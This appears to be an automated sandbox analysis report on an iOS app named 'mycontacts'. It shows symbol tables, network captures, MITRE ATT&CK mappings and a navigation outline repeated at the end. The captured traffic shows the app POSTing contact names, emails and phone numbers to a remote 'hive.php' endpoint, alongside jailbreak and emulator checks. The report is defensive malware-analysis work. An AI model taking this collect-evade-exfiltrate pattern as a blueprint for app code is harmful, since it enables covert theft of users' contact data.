-[AppDelegate application:didFinishLaunchingWithOptions:]

-[AppDelegate applicationDidBecomeActive:]

-[AppDelegate applicationDidEnterBackground:]

-[AppDelegate applicationWillEnterForeground:]

-[AppDelegate applicationWillResignActive:]

-[AppDelegate applicationWillTerminate:]

-[AppDelegate phoneNumberArray]

-[AppDelegate setPhoneNumberArray:]

-[AppDelegate setWindow:]

-[AppDelegate window]

-[ViewController .cxx_destruct]

-[ViewController doSimpleJailbreakChecks]

-[ViewController encryptData:key:iv:data:]

-[ViewController getContacts]

-[ViewController myContacts]

-[ViewController myTableView]

-[ViewController sendContacts]

-[ViewController setMyContacts:]

-[ViewController setMyTableView:]

-[ViewController tableView:cellForRowAtIndexPath:]

-[ViewController tableView:didSelectRowAtIndexPath:]

-[ViewController tableView:heightForRowAtIndexPath:]

-[ViewController tableView:numberOfRowsInSection:]

-[ViewController tableView:titleForHeaderInSection:]

-[ViewController viewDidLoad]

/Users/jonny/Documents/secure/svn/trunk/src/ios/usermode/mycontacts/Build/Intermediates/mycontacts.build/Release-iphoneos/mycontacts.build/Objects-normal/arm64/AppDelegate.o

/Users/jonny/Documents/secure/svn/trunk/src/ios/usermode/mycontacts/Build/Intermediates/mycontacts.build/Release-iphoneos/mycontacts.build/Objects-normal/arm64/ViewController.o

/Users/jonny/Documents/secure/svn/trunk/src/ios/usermode/mycontacts/Build/Intermediates/mycontacts.build/Release-iphoneos/mycontacts.build/Objects-normal/arm64/main.o

/Users/jonny/Documents/secure/svn/trunk/src/ios/usermode/mycontacts/mycontacts/

AppDelegate.m

ViewController.m

_CCCrypt

_CNContactEmailAddressesKey

_CNContactFamilyNameKey

_CNContactGivenNameKey

_CNContactPhoneNumbersKey

_CNLabelPhoneNumberMobile

_NSLog

_NSStringFromClass

_OBJC_CLASS_$_AVAudioSession

_OBJC_CLASS_$_AppDelegate

_OBJC_CLASS_$_CNContactFetchRequest

_OBJC_CLASS_$_CNContactStore

_OBJC_CLASS_$_NSArray

_OBJC_CLASS_$_NSData

_OBJC_CLASS_$_NSFileManager

_OBJC_CLASS_$_NSJSONSerialization

_OBJC_CLASS_$_NSMutableArray

_OBJC_CLASS_$_NSMutableDictionary

_OBJC_CLASS_$_NSMutableURLRequest

_OBJC_CLASS_$_NSString

_OBJC_CLASS_$_NSURL

_OBJC_CLASS_$_NSURLConnection

_OBJC_CLASS_$_UIAlertView

_OBJC_CLASS_$_UIApplication

_OBJC_CLASS_$_UIColor

_OBJC_CLASS_$_UIResponder

_OBJC_CLASS_$_UITableView

_OBJC_CLASS_$_UITableViewCell

_OBJC_CLASS_$_UIView

_OBJC_CLASS_$_UIViewController

_OBJC_CLASS_$_ViewController

_OBJC_IVAR_$_AppDelegate._phoneNumberArray

_OBJC_IVAR_$_AppDelegate._window

_OBJC_IVAR_$_ViewController._myContacts

_OBJC_IVAR_$_ViewController._myTableView

_OBJC_METACLASS_$_AppDelegate

_OBJC_METACLASS_$_NSObject

_OBJC_METACLASS_$_UIResponder

_OBJC_METACLASS_$_UIViewController

_OBJC_METACLASS_$_ViewController

_UIApplicationMain

__NSConcreteGlobalBlock

__NSConcreteStackBlock

___29-[ViewController getContacts]_block_invoke

___29-[ViewController getContacts]_block_invoke.136

___29-[ViewController getContacts]_block_invoke_2

___29-[ViewController viewDidLoad]_block_invoke

___52-[ViewController tableView:didSelectRowAtIndexPath:]_block_invoke

___CFConstantStringClassReference

___block_descriptor_32_e8_v12@?0B8l

___block_descriptor_40_e8_32s_e23_v24@?0@"CNContact"8^B16l

___block_descriptor_40_e8_32s_e5_v8@?0l

___block_descriptor_48_e8_32s40s_e20_v20@?0B8@"NSError"12l

___block_literal_global

___copy_helper_block_e8_32s

___copy_helper_block_e8_32s40s

___destroy_helper_block_e8_32s

___destroy_helper_block_e8_32s40s

___stack_chk_fail

___stack_chk_guard

__dispatch_main_q

__mh_execute_header

__objc_empty_cache

_checkEmulator

_dispatch_async

_free

_main

_malloc

_objc_autorelease

_objc_autoreleasePoolPop

_objc_autoreleasePoolPush

_objc_autoreleaseReturnValue

_objc_enumerationMutation

_objc_getProperty

_objc_msgSend

_objc_msgSendSuper2

_objc_release

_objc_retain

_objc_retainAutorelease

_objc_retainAutoreleasedReturnValue

_objc_setProperty_atomic

_objc_storeStrong

_sysctlbyname

dyld_stub_binder

main.m

External symbols

_CCCrypt

_NSLog

_NSStringFromClass

_UIApplicationMain

___stack_chk_fail

_dispatch_async

_free

_malloc

_objc_autorelease

_objc_autoreleasePoolPop

_objc_autoreleasePoolPush

_objc_autoreleaseReturnValue

_objc_enumerationMutation

_objc_getProperty

_objc_msgSend

_objc_msgSendSuper2

_objc_release

_objc_retain

_objc_retainAutorelease

_objc_retainAutoreleasedReturnValue

_objc_setProperty_atomic

_objc_storeStrong

_sysctlbyname

Extracted File
File path:	mycontacts.app/Base.lproj/LaunchScreen.storyboardc/Info.plist
File size:	258
File type:	Apple binary property list

Plist Content

{"UIViewControllerIdentifiersToNibNames": {"UIViewController-01J-lp-oVM": "UIViewController-01J-lp-oVM"}, "UIStoryboardDesignatedEntryPointIdentifier": "UIViewController-01J-lp-oVM", "UIStoryboardVersion": 1}

Extracted File
File path:	mycontacts.app/Base.lproj/Main.storyboardc/Info.plist
File size:	258
File type:	Apple binary property list

Plist Content

{"UIViewControllerIdentifiersToNibNames": {"UIViewController-BYZ-38-t0r": "UIViewController-BYZ-38-t0r"}, "UIStoryboardDesignatedEntryPointIdentifier": "UIViewController-BYZ-38-t0r", "UIStoryboardVersion": 1}

Extracted File
File path:	mycontacts.app/_CodeSignature/CodeResources
File size:	3895
File type:	XML 1.0 document, ASCII text

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 10:10:39.520167112 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.521358013 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.523772001 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.523776054 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.524985075 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.839765072 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.840943098 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.842883110 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.846473932 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.851003885 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.851260900 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.851262093 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.851780891 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.851783037 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.852880001 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.857106924 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.857249975 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.857460022 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.857620001 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:39.859023094 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.859275103 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:39.859508991 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:40.080440998 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:40.080533981 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:40.081744909 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:40.081880093 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:40.086083889 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:40.086564064 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:40.088212013 CEST	443	60916	93.184.216.34	192.168.0.70
Apr 7, 2021 10:10:40.088349104 CEST	60916	443	192.168.0.70	93.184.216.34
Apr 7, 2021 10:10:56.592191935 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.593377113 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.595767975 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.595772028 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.597008944 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.634155035 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.634244919 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.634964943 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.637451887 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.638135910 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.638138056 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.638258934 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.638261080 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.651468039 CEST	60917	443	192.168.0.70	17.248.145.147
Apr 7, 2021 10:10:56.652729988 CEST	443	60917	17.248.145.147	192.168.0.70
Apr 7, 2021 10:10:56.653341055 CEST	60917	443	192.168.0.70	17.248.145.147

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 10:10:18.485677958 CEST	138	138	192.168.0.40	192.168.0.255
Apr 7, 2021 10:10:39.508702040 CEST	54272	53	192.168.0.70	1.1.1.1
Apr 7, 2021 10:10:39.516366005 CEST	53	54272	1.1.1.1	192.168.0.70
Apr 7, 2021 10:10:56.574065924 CEST	53131	53	192.168.0.70	1.1.1.1
Apr 7, 2021 10:10:56.586472988 CEST	53	53131	1.1.1.1	192.168.0.70
Apr 7, 2021 10:11:28.037460089 CEST	63459	53	192.168.0.70	1.1.1.1
Apr 7, 2021 10:11:28.046732903 CEST	53	63459	1.1.1.1	192.168.0.70

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 7, 2021 10:10:39.508702040 CEST	192.168.0.70	1.1.1.1	0x81f9	Standard query (0)	www.example.com	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.574065924 CEST	192.168.0.70	1.1.1.1	0xc8f3	Standard query (0)	api.apple-cloudkit.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 7, 2021 10:10:39.516366005 CEST	1.1.1.1	192.168.0.70	0x81f9	No error (0)	www.example.com		93.184.216.34	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.com	api.apple-cloudkit.fe.apple-dns.net		CNAME (Canonical name)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.147	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.236	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.76	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.237	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.238	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.112	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.140	A (IP address)	IN (0x0001)
Apr 7, 2021 10:10:56.586472988 CEST	1.1.1.1	192.168.0.70	0xc8f3	No error (0)	api.apple-cloudkit.fe.apple-dns.net		17.248.145.232	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.example.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.70	60916	93.184.216.34	443

Timestamp	kBytes transferred	Direction	Data
2021-04-07 08:10:39 UTC	0	OUT	POST /hive.php HTTP/1.1 Host: www.example.com Content-Type: application/json Connection: keep-alive Accept: / User-Agent: mycontacts/1 CFNetwork/1121.2.2 Darwin/19.3.0 Content-Length: 1158 Accept-Language: en-us Accept-Encoding: gzip, deflate, br
2021-04-07 08:10:39 UTC	0	OUT	Data Raw: 7b 22 44 69 61 6e 65 20 50 72 65 73 74 6f 6e 22 3a 7b 22 45 6d 61 69 6c 22 3a 22 64 69 61 6e 65 2e 70 72 65 73 74 6f 6e 40 65 78 61 6d 70 6c 65 2e 6f 72 67 22 2c 22 4d 6f 62 69 6c 65 22 3a 22 2b 39 39 39 38 35 32 33 33 33 36 35 31 22 7d 2c 22 42 69 6c 6c 20 47 61 74 65 73 22 3a 7b 22 45 6d 61 69 6c 22 3a 22 62 69 6c 6c 2e 67 61 74 65 73 40 65 78 61 6d 70 6c 65 2e 6f 72 67 22 2c 22 4d 6f 62 69 6c 65 22 3a 22 2b 39 39 39 31 32 33 38 38 32 39 33 32 22 7d 2c 22 4a 61 6d 65 73 20 41 6c 62 61 6e 6f 22 3a 7b 22 45 6d 61 69 6c 22 3a 22 6a 61 6d 65 73 2e 61 6c 62 61 6e 6f 40 65 78 61 6d 70 6c 65 2e 6f 72 67 22 2c 22 4d 6f 62 69 6c 65 22 3a 22 2b 39 39 39 31 32 32 38 39 38 37 37 37 22 7d 2c 22 43 68 72 69 73 74 69 6e 65 20 53 61 6c 61 6e 64 65 72 22 3a 7b 22 45 6d Data Ascii: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
2021-04-07 08:10:40 UTC	1	IN	HTTP/1.1 404 Not Found Cache-Control: max-age=604800 Content-Type: text/html; charset=UTF-8 Date: Wed, 07 Apr 2021 08:10:40 GMT Expires: Wed, 14 Apr 2021 08:10:40 GMT Server: EOS (vny/044E) Content-Length: 445 Connection: close
2021-04-07 08:10:40 UTC	1	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t

System Behavior

Analysis Process: mycontacts PID: 27169 Parent PID: 1

General

Start time:	10:10:19
Start date:	07/04/2021
Path:	/var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts
File size:	98464 bytes
MD5 hash:	c486b4884915af4e27df995b133ed3b9

Chronological Activities

Disassembly

37 Functions

Function 1000082c0 -[ViewController sendContacts] Relevance: 1460

Address	Data	Annotations

Function 100007f10 -[ViewController doSimpleJailbreakChecks] Relevance: 620

Address	Data	Annotations

Function 100007350 -[ViewController tableView:didSelectRowAtIndexPath:] Relevance: 420

Address	Data	Annotations

Function 10000729c ___29-[ViewController viewDidLoad]_block_invoke Relevance: 20

Address	Data	Annotations

Function 10000751c -[ViewController tableView:cellForRowAtIndexPath:] Relevance: 1250

Address	Data	Annotations

Function 100006f58 -[ViewController viewDidLoad] Relevance: 710

Address	Data	Annotations

Function 100007c00 ___29-[ViewController getContacts]_block_invoke Relevance: 270

Address	Data	Annotations

Function 1000089fc -[ViewController encryptData:key:iv:data:] Relevance: 250

Address	Data	Annotations

Function 100007d98 ___29-[ViewController getContacts]_block_invoke_2 Relevance: 180

Address	Data	Annotations

Function 100007b5c -[ViewController getContacts] Relevance: 110

Address	Data	Annotations

Function 100008ca4 _main Relevance: 90

Address	Data	Annotations

Function 100007e68 ___29-[ViewController getContacts]_block_invoke.136 Relevance: 80

Address	Data	Annotations

Function 1000072f8 -[ViewController tableView:numberOfRowsInSection:] Relevance: 60

Address	Data	Annotations

Function 100008ba8 _checkEmulator Relevance: 60

Address	Data	Annotations

Function 1000074f0 ___52-[ViewController tableView:didSelectRowAtIndexPath:]_block_invoke Relevance: 30

Address	Data	Annotations

Function 1000072cc -[ViewController tableView:titleForHeaderInSection:] Relevance: 20

Address	Data	Annotations

Function 100007ec0 ___copy_helper_block_e8_32s40s Relevance: 20

Address	Data	Annotations

Function 100007ee8 ___destroy_helper_block_e8_32s40s Relevance: 20

Address	Data	Annotations

Function 100008c64 -[ViewController .cxx_destruct] Relevance: 20

Address	Data	Annotations

Function 100008d88 -[AppDelegate .cxx_destruct] Relevance: 20

Address	Data	Annotations

Function 1000072bc ___copy_helper_block_e8_32s Relevance: 10

Address	Data	Annotations

Function 1000072c4 ___destroy_helper_block_e8_32s Relevance: 10

Address	Data	Annotations

Function 100008c24 -[ViewController myTableView] Relevance: 10

Address	Data	Annotations

Function 100008c34 -[ViewController setMyTableView:] Relevance: 10

Address	Data	Annotations

Function 100008c50 -[ViewController setMyContacts:] Relevance: 10

Address	Data	Annotations

Function 100008d50 -[AppDelegate setWindow:] Relevance: 10

Address	Data	Annotations

Function 100008d74 -[AppDelegate setPhoneNumberArray:] Relevance: 10

Address	Data	Annotations

Function 100007344 -[ViewController tableView:heightForRowAtIndexPath:] Relevance: 0

Address	Data	Annotations

Function 100008c40 -[ViewController myContacts] Relevance: 0

Address	Data	Annotations

Function 100008d24 -[AppDelegate application:didFinishLaunchingWithOptions:] Relevance: 0

Address	Data	Annotations

Function 100008d2c -[AppDelegate applicationWillResignActive:] Relevance: 0

Address	Data	Annotations

Function 100008d30 -[AppDelegate applicationDidEnterBackground:] Relevance: 0

Address	Data	Annotations

Function 100008d34 -[AppDelegate applicationWillEnterForeground:] Relevance: 0

Address	Data	Annotations

Function 100008d38 -[AppDelegate applicationDidBecomeActive:] Relevance: 0

Address	Data	Annotations

Function 100008d3c -[AppDelegate applicationWillTerminate:] Relevance: 0

Address	Data	Annotations

Function 100008d40 -[AppDelegate window] Relevance: 0

Address	Data	Annotations

Function 100008d64 -[AppDelegate phoneNumberArray] Relevance: 0

Address	Data	Annotations

Description:	Adversaries may seek to identify all applications installed on the device. One use case for doing so is to identify the presence of endpoint security applications that may increase the adversary's risk of detection. Another use case is to identify the presence of applications that the adversary may wish to target.
Tactics:	Defense Evasion, Discovery
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.Adversaries may access `android.os.SystemProperties` via Java reflection to obtain specific system information.Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.
Tactics:	Defense Evasion, Discovery
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.
Tactics:	Discovery
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.
Tactics:	Collection
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may capture audio to collect information on a user of a mobile device using standard operating system APIs. Adversaries may target audio information such as user conversations, surroundings, phone calls, or other sensitive information.
Tactics:	Collection
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system.
Tactics:	Collection
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may utilize the camera to capture information about the user, their surroundings, or other physical identifiers. Adversaries may use the physical camera devices on a mobile device to capture images or video. By default, in Android and iOS, an application must request permission to access a camera device which is granted by the user through a request prompt. In Android, applications must hold the `android.permission.CAMERA` permission to access the camera. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file, and must request access to the camera at runtime.
Tactics:	Collection
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.
Tactics:	Command and Control, Exfiltration
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report mycontacts.ipa

Overview

General Information

Detection

Signatures

Classification

Signature Overview

Cryptography:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Screenshots

Thumbnails

Startup

Static File Info

General

Archive IPA

Archived Files

Extracted Files

Extracted File

Plist Content

Extracted File

Plist Content

Extracted File

Plist Content

Extracted File

Static Mach Info

General Information for header 1

Internal Symbols

External symbols

Extracted File

Plist Content

Extracted File

Plist Content

Extracted File

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

System Behavior

Analysis Process: mycontacts PID: 27169 Parent PID: 1

General

Chronological Activities

Disassembly

37 Functions

Function 1000082c0 -[ViewController sendContacts] Relevance: 1460

Function 100007f10 -[ViewController doSimpleJailbreakChecks] Relevance: 620

Function 100007350 -[ViewController tableView:didSelectRowAtIndexPath:] Relevance: 420

Function 10000729c ___29-[ViewController viewDidLoad]_block_invoke Relevance: 20

Function 10000751c -[ViewController tableView:cellForRowAtIndexPath:] Relevance: 1250